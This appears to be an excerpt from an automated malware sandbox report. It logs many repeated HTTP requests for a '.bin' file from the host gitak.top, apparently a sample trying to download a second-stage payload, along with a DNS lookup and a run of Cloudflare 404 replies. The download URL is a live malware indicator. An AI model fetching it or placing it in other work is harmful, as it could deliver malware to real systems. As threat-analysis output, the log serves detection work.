      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: gitak.top
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RtkS5n2C9K8mjiAQPIkIP9T88mXoVLDUFQwJUfSU5sWwsYGnJKDIxQnhTK%2BYG5ngpEcRf5RfEbq4xB%2BvWG1QUI17VL2JbGYWyhEsdLzTqLMGDmjiPOeBBprfnY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec105a2956ec-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 10Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLabE8DPPtKS9rn%2FTmLbROV6pDDQFvRUk5aR5YeVnvTApARwxz%2F8eMLXqLjU1H2LPDuTGQXlPnvkwrSU8v3J6RPJcu5I7EI7q06db33Ur7Nef7zicxytRomCyHM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec535dbf2d28-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 21Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWXXS2NrwTGdUxdtZPpsZTpq8PP%2Bh4tk92eB%2FEd5X13HxWMvQ%2B6NdI2shR5ctT2z8oU1E4HTXmPeGexsCOi5j4W%2FHdkE0kdFxfXspk4Tk%2Bm1yHedovEr5Pti9IA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec950eb559f1-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 31Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0fWlft6fUQ4S4m4KlgLPN5GN2AGQUD7AL7zviH7Ky3zISp6ZpHnfTQrQtdHPn3GPqoPei3sBc5gN1WUIihvF5Y%2BpAf7A4Bpcdnl1W%2BRSByVg3wQsjOuM3azODM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babecd6edd32d15-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 42Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGiHI3lLvT9Gur%2FzlVH2DRekG2i01nj0wF8JaD0PDHAb3Vx3HLZBTbOoe87ew2QVaaNRadhADqYBGLdObIr7C8zJRuT68CpYshrP3ekInFYY3JTra00i0dP02DA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed18a9bb082e-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 52Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7gL3sdbOuJzSEcJkT99MXrxL780mMWdYRsl3RrCszGJhf9VuZqfcXQG0z6504sWRm1nsGiSL4fIXJA2sCPjAZe5kDXg2AB3Xa9%2BYi2a0kOCrOsKiLgG0cxQFTo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed5a69411fd4-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 63Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5b2RW%2Fj%2BT4RrEZWx4D%2FnyakwG90IGNXz%2Fl%2Fy9eJcEXVaz99bZLUGlNYOClAFPHSWDkTInHh3OqeupG1uIY%2FCy1DDISV8N41MvZpYqErhYiSpEZDk9JPknQQYf8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed9c1cd9c584-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 73Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xhKipF4ZA8%2Bkvdd%2BU1F%2BrBg4eynZTN%2BjBDWj9bgfGgH%2BilT3MDXaYBqPidLk%2BHIjGpOJ1KV5XU%2BxKhXjAr%2FlM%2FPDMyPa%2BmW65B7puXv5TX78IU5IOvcZbn8wsk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babedddcc3059df-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 84Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoNQvU%2F68bPKsSQUFFONu8irGKTbWrh9ZiAyCeTfaGqzkT7pMFpOm5qS5cv%2BpGcO9DD5iqwclNCCrU5vtum1PhltMVpXIYst3f8%2BQdM1rJzMTQXGTSBbOxZT56Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babee1f886782ec-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 94Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwkKcTa3VXkc7R9rQYkkb4eqPmY8q4UzebAK8gzZsZ4XJBRVEUF19Zbfu0H4L7Gp15nI4QJZ7M5%2F%2Fm8bIekDe9NEAW9JWIima4oQgcnbn1Gr3bjWeb6%2F2hGaJTo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babee614a62c968-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 105Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13eTPd51Zx4b9EW4xNYd4Zei8NPIGF4uqYtQUC%2BvF7tiLZ45S6fm%2B4M7DPeBk7meYNsqfYwxRKlb%2BQqUwjx4TJBXNlEP7Z%2FylcPwqo20X09H0aQMyGuOzkdWb64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babeea32f3d061c-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 115Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqmBalLXHAr8qRHykb93s7Lp50lREcKDyK8n%2Bv3wMBlsq8eWm%2FglNpbgr71VKPXaN9RNmJINX9aly%2FjGoZjXd5KoUWa3uB7RDsG05r8TwF7mWPTyTmQB3N%2Fsh6c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babeee4daa80854-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 126Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBfD0KFqKH%2FjuEPqXLGmfVRvGlYJ7xonfYKsjAuioIk3mZ0nD9XfU%2BsdBUtdQhBZsKK5pD6i%2FUtbiuoTH6VFzUzLjhCbEFyDCq93DypeKvLBwuv6cw7Or8rps0k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babef268d5d2d0e-IADalt-svc: h3=":443"; ma=86400
